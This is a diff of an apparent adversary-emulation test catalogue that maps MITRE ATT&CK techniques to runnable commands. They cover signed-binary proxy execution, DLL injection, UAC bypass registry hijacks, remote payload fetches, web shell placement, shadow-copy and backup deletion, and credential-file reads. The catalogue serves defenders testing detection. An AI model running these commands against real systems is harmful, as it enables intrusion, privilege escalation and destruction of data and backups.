@@ -11909,7 +11909,7 @@ defense-evasion:
elevation_required: false
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
'
'
- name: Rundll32 syssetup.dll Execution
description: |
Test execution of a command using rundll32.exe with syssetup.dll.
@@ -11935,7 +11935,7 @@ defense-evasion:
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
128 .\#{inf_to_execute}
'
'
- name: Rundll32 setupapi.dll Execution
description: |
Test execution of a command using rundll32.exe with setupapi.dll.
@@ -11961,7 +11961,7 @@ defense-evasion:
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
.\#{inf_to_execute}
'
'
T1064:
technique:
x_mitre_permissions_required:
@@ -12030,7 +12030,7 @@ defense-evasion:
- name: Create and Execute Bash Shell Script
description: 'Creates and executes a simple bash script.
'
'
supported_platforms:
- macos
- linux
@@ -12045,7 +12045,7 @@ defense-evasion:
- name: Create and Execute Batch Script
description: 'Creates and executes a simple batch script.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12065,7 +12065,7 @@ defense-evasion:
\n"
cleanup_command: 'del #{script_to_create} >nul 2>&1
'
'
T1218:
technique:
x_mitre_data_sources:
@@ -12179,7 +12179,7 @@ defense-evasion:
description: 'Injects arbitrary DLL into running process specified by process
ID. Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12203,12 +12203,12 @@ defense-evasion:
elevation_required: true
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
'
'
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12220,12 +12220,12 @@ defense-evasion:
name: command_prompt
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
'
'
- name: Register-CimProvider - Execute evil dll
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
note this dll can be served up via SMB
'
'
supported_platforms:
- windows
input_arguments:
@@ -12244,11 +12244,11 @@ defense-evasion:
name: command_prompt
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
'
'
- name: Msiexec.exe - Execute Local MSI file
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12265,12 +12265,12 @@ defense-evasion:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
'
'
- name: Msiexec.exe - Execute Remote MSI file
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
in application installation, commonly seen in malware execution.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12282,12 +12282,12 @@ defense-evasion:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
'
'
- name: Msiexec.exe - Execute Arbitrary DLL
description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
installation.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12306,11 +12306,11 @@ defense-evasion:
name: command_prompt
command: 'msiexec.exe /y "#{dll_payload}"
'
'
- name: Odbcconf.exe - Execute Arbitrary DLL
description: 'Execute arbitrary DLL file stored locally.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12329,7 +12329,7 @@ defense-evasion:
name: command_prompt
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
'
'
- name: InfDefaultInstall.exe .inf Execution
description: |
Test execution of a .inf using InfDefaultInstall.exe
@@ -12354,7 +12354,7 @@ defense-evasion:
elevation_required: false
command: 'InfDefaultInstall.exe #{inf_to_execute}
'
'
T1216:
technique:
x_mitre_data_sources:
@@ -12411,7 +12411,7 @@ defense-evasion:
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12425,12 +12425,12 @@ defense-evasion:
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
'
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServer script with options
to execute an arbitrary PowerShell command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12443,12 +12443,12 @@ defense-evasion:
elevation_required: false
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
'
- name: manage-bde.wsf Signed Script Command Execution
description: 'Executes the signed manage-bde.wsf script with options to execute
an arbitrary command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12464,7 +12464,7 @@ defense-evasion:
cscript manage-bde.wsf
cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
'
'
T1151:
technique:
x_mitre_data_sources:
@@ -12525,7 +12525,7 @@ defense-evasion:
- name: Space After Filename
description: 'Space After Filename
'
'
supported_platforms:
- macos
executor:
@@ -12587,7 +12587,7 @@ defense-evasion:
- name: Set a file's access timestamp
description: 'Stomps on the access timestamp of a file
'
'
supported_platforms:
- linux
- macos
@@ -12600,11 +12600,11 @@ defense-evasion:
name: sh
command: 'touch -a -t 197001010000.00 #{target_filename}
'
'
- name: Set a file's modification timestamp
description: 'Stomps on the modification timestamp of a file
'
'
supported_platforms:
- linux
- macos
@@ -12617,7 +12617,7 @@ defense-evasion:
name: sh
command: 'touch -m -t 197001010000.00 #{target_filename}
'
'
- name: Set a file's creation timestamp
description: |
Stomps on the create timestamp of a file
@@ -12661,7 +12661,7 @@ defense-evasion:
name: sh
command: 'touch -acmr #{reference_file_path} {target_file_path}
'
'
- name: Windows - Modify file creation timestamp with PowerShell
description: |
Modifies the file creation timestamp of a specified file.
@@ -12684,7 +12684,7 @@ defense-evasion:
command: 'powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime
= #{target_date_time} }
'
'
- name: Windows - Modify file last modified timestamp with PowerShell
description: |
Modifies the file last modified timestamp of a specified file.
@@ -12707,7 +12707,7 @@ defense-evasion:
command: 'powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime
= #{target_date_time} }
'
'
- name: Windows - Modify file last access timestamp with PowerShell
description: |
Modifies the last access timestamp of a specified file.
@@ -12730,7 +12730,7 @@ defense-evasion:
command: 'powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime
= #{target_date_time} }
'
'
T1127:
technique:
x_mitre_data_sources:
@@ -12863,7 +12863,7 @@ defense-evasion:
- name: MSBuild Bypass Using Inline Tasks
description: 'Executes the code in a project file using. C# Example
'
'
supported_platforms:
- windows
input_arguments:
@@ -12883,7 +12883,7 @@ defense-evasion:
elevation_required: false
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
'
'
T1102:
technique:
x_mitre_permissions_required:
@@ -12950,7 +12950,7 @@ defense-evasion:
- name: Reach out to C2 Pointer URLs via command_prompt
description: 'Download data from a public website using command line
'
'
supported_platforms:
- windows
executor:
@@ -12959,14 +12959,14 @@ defense-evasion:
command: 'bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/
%TEMP%\bitsadmindownload.html
'
'
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
'
'
- name: Reach out to C2 Pointer URLs via powershell
description: 'Multiple download methods for files using powershell
'
'
supported_platforms:
- windows
executor:
@@ -13073,7 +13073,7 @@ defense-evasion:
transformation using a local payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13101,13 +13101,13 @@ defense-evasion:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
'
- name: MSXSL Bypass using remote files
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a remote payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13123,12 +13123,12 @@ defense-evasion:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
'
- name: WMIC bypass using local XSL file
description: 'Executes the code specified within a XSL script using a local
payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13151,12 +13151,12 @@ defense-evasion:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
'
'
- name: WMIC bypass using remote XSL file
description: 'Executes the code specified within a XSL script using a remote
payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13172,7 +13172,7 @@ defense-evasion:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
'
'
privilege-escalation:
T1134:
technique:
@@ -13403,7 +13403,7 @@ privilege-escalation:
description: 'Attaches cmd.exe to a list of processes. Configure your own Input
arguments to a different executable or list of executables.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13411,7 +13411,7 @@ privilege-escalation:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
'
'
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
@@ -13419,7 +13419,7 @@ privilege-escalation:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
'
'
type: Path
default: C:\windows\system32\cmd.exe
executor:
@@ -13636,7 +13636,7 @@ privilege-escalation:
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system
'
'
supported_platforms:
- windows
input_arguments:
@@ -13649,7 +13649,7 @@ privilege-escalation:
elevation_required: true
command: 'reg.exe import #{registry_file}
'
'
T1138:
technique:
x_mitre_data_sources:
@@ -13756,7 +13756,7 @@ privilege-escalation:
- name: New shim database files created in the default shim database directory
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
'
'
supported_platforms:
- windows
executor:
@@ -13771,7 +13771,7 @@ privilege-escalation:
- name: Registry key creation and/or modification events for SDB
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
'
'
supported_platforms:
- windows
executor:
@@ -13884,7 +13884,7 @@ privilege-escalation:
description: 'Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
'
supported_platforms:
- windows
input_arguments:
@@ -13899,12 +13899,12 @@ privilege-escalation:
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
'
'
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
'
supported_platforms:
- windows
input_arguments:
@@ -13921,12 +13921,12 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
'
'
- name: Bypass UAC using Fodhelper
description: 'Bypasses User Account Control using the Windows 10 Features on
Demand Helper (fodhelper.exe). Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13943,12 +13943,12 @@ privilege-escalation:
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
'
'
- name: Bypass UAC using Fodhelper - PowerShell
description: 'PowerShell code to bypass User Account Control using the Windows
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13967,12 +13967,12 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
'
- name: Bypass UAC using ComputerDefaults - PowerShell
description: 'PowerShell code to bypass User Account Control using ComputerDefaults.exe
on Windows 10
'
'
supported_platforms:
- windows
input_arguments:
@@ -13991,13 +13991,13 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
'
- name: Bypass UAC by Mocking Trusted Directories
description: 'Creates a fake "trusted directory" and copies a binary to bypass
UAC. The UAC bypass may not work on fully patched systems, however the directory
structure will be created.
'
'
supported_platforms:
- windows
input_arguments:
@@ -14186,7 +14186,7 @@ privilege-escalation:
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
'
supported_platforms:
- macos
input_arguments:
@@ -14418,7 +14418,7 @@ privilege-escalation:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: 'Hooks functions in PowerShell to read TLS Communications
'
'
supported_platforms:
- windows
input_arguments:
@@ -14532,7 +14532,7 @@ privilege-escalation:
- name: IFEO Add Debugger
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -14550,15 +14550,15 @@ privilege-escalation:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
'
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /f
'
'
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -14650,7 +14650,7 @@ privilege-escalation:
- name: Launch Daemon
description: 'Utilize LaunchDaemon to launch `Hello World`
'
'
supported_platforms:
- macos
executor:
@@ -14748,7 +14748,7 @@ privilege-escalation:
- name: Service Installation
description: 'Installs A Local Service
'
'
supported_platforms:
- windows
input_arguments:
@@ -14779,7 +14779,7 @@ privilege-escalation:
- name: Service Installation PowerShell Installs A Local Service using PowerShell
description: 'Installs A Local Service via PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -14986,7 +14986,7 @@ privilege-escalation:
- name: Plist Modification
description: 'Modify MacOS plist file in one of two directories
'
'
supported_platforms:
- macos
executor:
@@ -15079,7 +15079,7 @@ privilege-escalation:
description: 'Appends a start process cmdlet to the current user''s powershell
profile pofile that points to a malicious executable
'
'
supported_platforms:
- windows
input_arguments:
@@ -15262,7 +15262,7 @@ privilege-escalation:
- name: Process Injection via mavinject.exe
description: 'Windows 10 Utility To Inject DLLS
'
'
supported_platforms:
- windows
input_arguments:
@@ -15290,7 +15290,7 @@ privilege-escalation:
- name: Process Injection via PowerSploit
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
'
'
supported_platforms:
- windows
input_arguments:
@@ -15325,13 +15325,13 @@ privilege-escalation:
elevation_required: true
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
'
'
- name: Shared Library Injection via LD_PRELOAD
description: 'This test injects a shared object library via the LD_PRELOAD environment
variable to execute. This technique was used by threat actor Rocke during
the exploitation of Linux web servers. This requires the `glibc` package.
'
'
supported_platforms:
- linux
input_arguments:
@@ -15344,7 +15344,7 @@ privilege-escalation:
elevation_required: false
command: 'LD_PRELOAD=#{path_to_shared_library} ls
'
'
- name: Process Injection via C#
description: |
Process Injection using C#
@@ -15482,7 +15482,7 @@ privilege-escalation:
elevation_required: false
command: 'at 13:20 /interactive cmd
'
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -15501,14 +15501,14 @@ privilege-escalation:
elevation_required: true
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
'
'
- name: Scheduled task Remote
description: 'Create a task on a remote system
'
'
supported_platforms:
- windows
input_arguments:
@@ -15538,10 +15538,10 @@ privilege-escalation:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
'
'
- name: Powershell Cmdlet Scheduled Task
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
@@ -15561,7 +15561,7 @@ privilege-escalation:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
'
T1058:
technique:
x_mitre_data_sources:
@@ -15701,7 +15701,7 @@ privilege-escalation:
description: 'Make, change owner, and change file attributes on a C source code
file
'
'
supported_platforms:
- macos
- linux
@@ -15727,7 +15727,7 @@ privilege-escalation:
- name: Set a SetUID flag on file
description: 'This test sets the SetUID flag on a file in Linux and macOS.
'
'
supported_platforms:
- macos
- linux
@@ -15745,11 +15745,11 @@ privilege-escalation:
sudo chmod u+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
'
- name: Set a SetGID flag on file
description: 'This test sets the SetGID flag on a file in Linux and macOS.
'
'
supported_platforms:
- macos
- linux
@@ -15767,7 +15767,7 @@ privilege-escalation:
sudo chmod g+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
'
T1165:
technique:
x_mitre_permissions_required:
@@ -15839,10 +15839,10 @@ privilege-escalation:
elevation_required: true
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
'
'
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
'
'
T1169:
technique:
x_mitre_data_sources:
@@ -15892,7 +15892,7 @@ privilege-escalation:
- name: Sudo usage
description: 'Common Sudo enumeration methods.
'
'
supported_platforms:
- macos
- linux
@@ -15973,7 +15973,7 @@ privilege-escalation:
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
'
supported_platforms:
- macos
- linux
@@ -15986,7 +15986,7 @@ privilege-escalation:
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
'
supported_platforms:
- macos
- linux
@@ -16083,10 +16083,10 @@ privilege-escalation:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
'
cleanup_command: 'del #{web_shell_path} >nul 2>&1
'
'
impact:
T1531:
technique:
@@ -16148,7 +16148,7 @@ impact:
description: 'Changes the user password to hinder access attempts. Seen in use
by LockerGoga.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16173,14 +16173,14 @@ impact:
elevation_required: true
command: 'net.exe user #{user_account} #{new_password}
'
'
cleanup_command: 'net.exe user #{user_account} /delete
'
'
- name: Delete User - Windows
description: 'Deletes a user account to prevent access.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16275,7 +16275,7 @@ impact:
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
numerous ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16283,12 +16283,12 @@ impact:
elevation_required: true
command: 'vssadmin.exe delete shadows /all /quiet
'
'
- name: Windows - Delete Windows Backup Catalog
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16296,7 +16296,7 @@ impact:
elevation_required: true
command: 'wbadmin.exe delete catalog -quiet
'
'
- name: Windows - Disable Windows Recovery Console Repair
description: |
Disables repair by the Windows Recovery Console on boot.
@@ -16358,11 +16358,11 @@ impact:
name: bash
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
'
'
- name: Windows - Delete Backup Files
description: 'Deletes backup files in a manner similar to Ryuk ransomware.
'
'
supported_platforms:
- windows
executor:
@@ -16371,7 +16371,7 @@ impact:
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
'
'
'':
technique:
x_mitre_data_sources:
@@ -16495,7 +16495,7 @@ impact:
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
numerous ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16503,12 +16503,12 @@ impact:
elevation_required: true
command: 'vssadmin.exe delete shadows /all /quiet
'
'
- name: Windows - Delete Volume Shadow Copies via WMI
description: 'Deletes Windows Volume Shadow Copies via WMI. This technique is
used by numerous ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16516,12 +16516,12 @@ impact:
elevation_required: true
command: 'wmic.exe shadowcopy delete
'
'
- name: Windows - Delete Windows Backup Catalog
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16529,7 +16529,7 @@ impact:
elevation_required: true
command: 'wbadmin.exe delete catalog -quiet
'
'
- name: Windows - Disable Windows Recovery Console Repair
description: "Disables repair by the Windows Recovery Console on boot. \nThis
technique is used by numerous ransomware families and APT malware such as
@@ -16554,7 +16554,7 @@ impact:
command: 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object
{$_.Delete();}"
'
'
T1496:
technique:
x_mitre_data_sources:
@@ -16630,7 +16630,7 @@ impact:
name: bash
command: 'yes > /dev/null
'
'
T1489:
technique:
x_mitre_permissions_required:
@@ -16702,7 +16702,7 @@ impact:
- name: Windows - Stop service using Service Controller
description: 'Stops a specified service using the sc.exe command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16715,14 +16715,14 @@ impact:
elevation_required: true
command: 'sc.exe stop #{service_name}
'
'
cleanup_command: 'sc.exe start #{service_name}
'
'
- name: Windows - Stop service using net.exe
description: 'Stops a specified service using the net.exe command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16735,10 +16735,10 @@ impact:
elevation_required: true
command: 'net.exe stop #{service_name}
'
'
cleanup_command: 'net.exe start #{service_name}
'
'
- name: Windows - Stop service by killing process
description: "Stops a specified service killng the service's process. \nThis
technique was used by WannaCry.\n"
@@ -16754,7 +16754,7 @@ impact:
elevation_required: false
command: 'taskkill.exe /f /im #{process_name}
'
'
T1529:
technique:
x_mitre_data_sources:
@@ -16813,7 +16813,7 @@ impact:
- name: Shutdown System - Windows
description: 'This test shuts down a Windows system.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16826,11 +16826,11 @@ impact:
elevation_required: true
command: 'shutdown /s /t #{timeout}
'
'
- name: Restart System - Windows
description: 'This test restarts a Windows system.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16843,11 +16843,11 @@ impact:
elevation_required: true
command: 'shutdown /r /t #{timeout}
'
'
- name: Restart System via `shutdown` - macOS/Linux
description: 'This test restarts a macOS/Linux system.
'
'
supported_platforms:
- macos
- linux
@@ -16861,11 +16861,11 @@ impact:
elevation_required: true
command: 'shutdown -r #{timeout}
'
'
- name: Shutdown System via `shutdown` - macOS/Linux
description: 'This test shuts down a macOS/Linux system using a halt.
'
'
supported_platforms:
- macos
- linux
@@ -16879,11 +16879,11 @@ impact:
elevation_required: true
command: 'shutdown -h #{timeout}
'
'
- name: Restart System via `reboot` - macOS/Linux
description: 'This test restarts a macOS/Linux system via `reboot`.
'
'
supported_platforms:
- macos
- linux
@@ -16892,11 +16892,11 @@ impact:
elevation_required: true
command: 'reboot
'
'
- name: Shutdown System via `halt` - Linux
description: 'This test shuts down a Linux system using `halt`.
'
'
supported_platforms:
- linux
executor:
@@ -16906,7 +16906,7 @@ impact:
- name: Reboot System via `halt` - Linux
description: 'This test restarts a Linux system using `halt`.
'
'
supported_platforms:
- linux
executor:
@@ -16916,7 +16916,7 @@ impact:
- name: Shutdown System via `poweroff` - Linux
description: 'This test shuts down a Linux system using `poweroff`.
'
'
supported_platforms:
- linux
executor:
@@ -16926,7 +16926,7 @@ impact:
- name: Reboot System via `poweroff` - Linux
description: 'This test restarts a Linux system using `poweroff`.
'
'
supported_platforms:
- linux
executor:
@@ -17028,7 +17028,7 @@ discovery:
- name: Enumerate all accounts
description: 'Enumerate all accounts by copying /etc/passwd to another file
'
'
supported_platforms:
- linux
- macos
@@ -17041,7 +17041,7 @@ discovery:
name: sh
command: 'cat /etc/passwd > #{output_file}
'
'
- name: View sudoers access
description: "(requires root)\n"
supported_platforms:
@@ -17056,11 +17056,11 @@ discovery:
name: sh
command: 'cat /etc/sudoers > #{output_file}
'
'
- name: View accounts with UID 0
description: 'View accounts wtih UID 0
'
'
supported_platforms:
- linux
- macos
@@ -17073,11 +17073,11 @@ discovery:
name: sh
command: 'grep ''x:0:'' /etc/passwd > #{output_file}
'
'
- name: List opened files by user
description: 'List opened files by user
'
'
supported_platforms:
- linux
- macos
@@ -17085,11 +17085,11 @@ discovery:
name: sh
command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
'
'
- name: Show if a user account has ever logged in remotely
description: 'Show if a user account has ever logged in remotely
'
'
supported_platforms:
- linux
- macos
@@ -17102,11 +17102,11 @@ discovery:
name: sh
command: 'lastlog > #{output_file}
'
'
- name: Enumerate users and groups
description: 'Utilize groups and id to enumerate users and groups
'
'
supported_platforms:
- linux
- macos
@@ -17118,7 +17118,7 @@ discovery:
- name: Enumerate users and groups
description: 'Utilize local utilities to enumerate users and groups
'
'
supported_platforms:
- macos
executor:
@@ -17132,7 +17132,7 @@ discovery:
- name: Enumerate all accounts
description: 'Enumerate all accounts
'
'
supported_platforms:
- windows
executor:
@@ -17148,7 +17148,7 @@ discovery:
- name: Enumerate all accounts via PowerShell
description: 'Enumerate all accounts via PowerShell
'
'
supported_platforms:
- windows
executor:
@@ -17169,7 +17169,7 @@ discovery:
- name: Enumerate logged on users
description: 'Enumerate logged on users
'
'
supported_platforms:
- windows
executor:
@@ -17177,11 +17177,11 @@ discovery:
elevation_required: false
command: 'query user
'
'
- name: Enumerate logged on users via PowerShell
description: 'Enumerate logged on users via PowerShell
'
'
supported_platforms:
- windows
executor:
@@ -17189,7 +17189,7 @@ discovery:
elevation_required: false
command: 'query user
'
'
T1010:
technique:
x_mitre_data_sources:
@@ -17231,7 +17231,7 @@ discovery:
description: 'Compiles and executes C# code to list main window titles associated
with each process.
'
'
supported_platforms:
- windows
input_arguments:
@@ -17258,7 +17258,7 @@ discovery:
#{output_file_name}
cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1
'
'
T1217:
technique:
x_mitre_data_sources:
@@ -17306,7 +17306,7 @@ discovery:
description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
that contains bookmarks and lists any found instances to a text file.
'
'
supported_platforms:
- linux
executor:
@@ -17314,12 +17314,12 @@ discovery:
command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >>
/tmp/firefox-bookmarks.txt \;
'
'
- name: List Mozilla Firefox Bookmark Database Files on macOS
description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
that contains bookmarks and lists any found instances to a text file.
'
'
supported_platforms:
- macos
executor:
@@ -17327,12 +17327,12 @@ discovery:
command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {}
>> /tmp/firefox-bookmarks.txt \;
'
'
- name: List Google Chrome Bookmark JSON Files on macOS
description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains
bookmarks in JSON format and lists any found instances to a text file.
'
'
supported_platforms:
- macos
executor:
@@ -17340,31 +17340,31 @@ discovery:
command: 'find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt
\;
'
'
- name: List Google Chrome Bookmarks on Windows with powershell
description: 'Searches for Google Chromes''s Bookmarks file (on Windows distributions)
that contains bookmarks.
'
'
supported_platforms:
- windows
executor:
name: powershell
command: 'where.exe /R C:\Users\ Bookmarks
'
'
- name: List Google Chrome Bookmarks on Windows with command prompt
description: 'Searches for Google Chromes''s Bookmarks file (on Windows distributions)
that contains bookmarks.
'
'
supported_platforms:
- windows
executor:
name: command_prompt
command: 'where /R C:\Users\ Bookmarks
'
'
'':
technique:
x_mitre_data_sources:
@@ -17441,7 +17441,7 @@ discovery:
or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
especially in a short period of time, may aid in detection.
'
'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_contributors:
- Sunny Neo
@@ -17569,7 +17569,7 @@ discovery:
name: command_prompt
command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr *
'
'
- name: Windows - Discover domain trusts with nltest
description: |
Uses the nltest command to discover domain trusts.
@@ -17581,11 +17581,11 @@ discovery:
name: command_prompt
command: 'nltest /domain_trusts
'
'
- name: Powershell enumerate domains and forests
description: 'Use powershell to enumerate AD information
'
'
supported_platforms:
- windows
executor:
@@ -17652,7 +17652,7 @@ discovery:
- name: File and Directory Discovery
description: 'Find or discover files on the file system
'
'
supported_platforms:
- windows
executor:
@@ -17670,7 +17670,7 @@ discovery:
- name: File and Directory Discovery
description: 'Find or discover files on the file system
'
'
supported_platforms:
- windows
executor:
@@ -17705,7 +17705,7 @@ discovery:
- name: Nix File and Directory Discovery
description: 'Find or discover files on the file system
'
'
supported_platforms:
- macos
- linux
@@ -17773,7 +17773,7 @@ discovery:
- name: Port Scan
description: 'Scan ports to check for listening ports
'
'
supported_platforms:
- linux
- macos
@@ -17788,7 +17788,7 @@ discovery:
- name: Port Scan Nmap
description: 'Scan ports to check for listening ports with Nmap.
'
'
supported_platforms:
- linux
- macos
@@ -17892,7 +17892,7 @@ discovery:
- name: Network Share Discovery
description: 'Network Share Discovery
'
'
supported_platforms:
- macos
- linux
@@ -17910,7 +17910,7 @@ discovery:
- name: Network Share Discovery command prompt
description: 'Network Share Discovery utilizing the command prompt
'
'
supported_platforms:
- windows
input_arguments:
@@ -17923,11 +17923,11 @@ discovery:
elevation_required: false
command: 'net view \\#{computer_name}
'
'
- name: Network Share Discovery PowerShell
description: 'Network Share Discovery utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -17951,7 +17951,7 @@ discovery:
elevation_required: false
command: 'net share
'
'
